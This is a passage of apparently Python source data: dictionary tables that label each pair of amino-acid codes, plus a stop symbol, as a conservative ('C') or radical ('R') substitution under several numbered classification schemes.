",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"
):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"C",("Y","A"):"C",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"C",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"C",("Y","N"):"C",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"C",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"C",("Y","C"):"C",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"C",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"C",("Y","G"):"C",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"C",("Y","I"):"C",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"C",("Y","L"):"C",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"C",("Y","M"):"C",("V","M"):"C",("P","F"):"C",("S","F"):"C",("T","F"):"C",("W","F"):"C",("Y","F"):"C",("V","F"):"C",("S","P"):"C",("T","P"):"C",("W","P"):"C",("Y","P"):"C",("V","P"):"C",("T","S"):"C",("W","S"):"C",("Y","S"):"C",("V","S"):"C",("W","T"):"C",("Y","T"):"C",("V","T"):"C",("Y","W"):"C",("V","W"):"C",("V","Y"):"C",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},2:{("R","H"):"C",("R","K"):"C",("R","D"):"C",("R","E"):"C",("R","A"):"R",("R","N"):"C",("R","C"):"C",("R","Q"):"C",("R","G"):"C",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"C",("R","T"):"C",("R","W"):"R",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"C",("H","E"):"C",("H","A"):"R",("H","N"):"C",("H","C"):"C",("H","Q"):"C",("H","G"):"C",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"C",("H","T"):"C",("H","W"):"R",("H","Y"):"C",("H","V"):"R",("K","D"):"C",("K","E"):"C",("K","A"):"R",("K","N"):"C",("K","C"):"C",("K","Q"):"C",("K","G"):"C",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"C",("K","T"):"C",("K","W"):"R",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"C",("D","Q"):"C",("D","G"):"C",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"C",("D","T"):"C",("D","W"):"R",("D","Y"):"C",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"C",("E","Q"):"C",("E","G"):"C",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"C",("E","T"):"C",("E","W"):"R",("E","Y"):"C",("E","V"):"R",("A","N"):"R",("A
","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"C",("E","R"):"C",("A","R"):"R",("N","R"):"C",("C","R"):"C",("Q","R"):"C",("G","R"):"C",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"C",("T","R"):"C",("W","R"):"R",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"C",("E","H"):"C",("A","H"):"R",("N","H"):"C",("C","H"):"C",("Q","H"):"C",("G","H"):"C",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"C",("T","H"):"C",("W","H"):"R",("Y","H"):"C",("V","H"):"R",("D","K"):"C",("E","K"):"C",("A","K"):"R",("N","K"):"C",("C","K"):"C",("Q","K"):"C",("G","K"):"C",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"C",("T","K"):"C",("W","K"):"R",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"C",("Q","D"):"C",("G","D"):"C",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"C",("T","D"):"C",("W","D"):"R",("Y","D"):"C",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"C",("Q","E"):"C",("G","E"):"C",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"C",("T","E"):"C",("W","E"):"R",("Y","E"):"C",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("
T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},3:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"R",("D","Q"):"C",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"R",("E","Q"):"C",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"R",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"R",("N","T"):"R",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"R",("C","T"):"R",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"C",("F","T"):"C",("F","W"):"R",("F","Y"):"
R",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"R",("Q","D"):"C",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"R",("Q","E"):"C",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"R",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"R",("T","N"):"R",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"R",("T","C"):"R",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"C",("T","F"):"C",("W","F"):"R",("Y","F"):"R",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},4:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","
Q"):"C",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"C",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"C",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"C",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"C",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"C",("H","Y"):"C",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"C",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"C",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"C",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"C",("N","Q"):"R",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"C",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"C",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"C",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"C",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"C",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"C",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"C",("Y","H"):"C",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"C",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"C",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"C",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N",
"E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"C",("Q","N"):"R",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"C",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},5:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"R",("A","P"):"C",("A","S"):"C",
("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"R",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"C",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",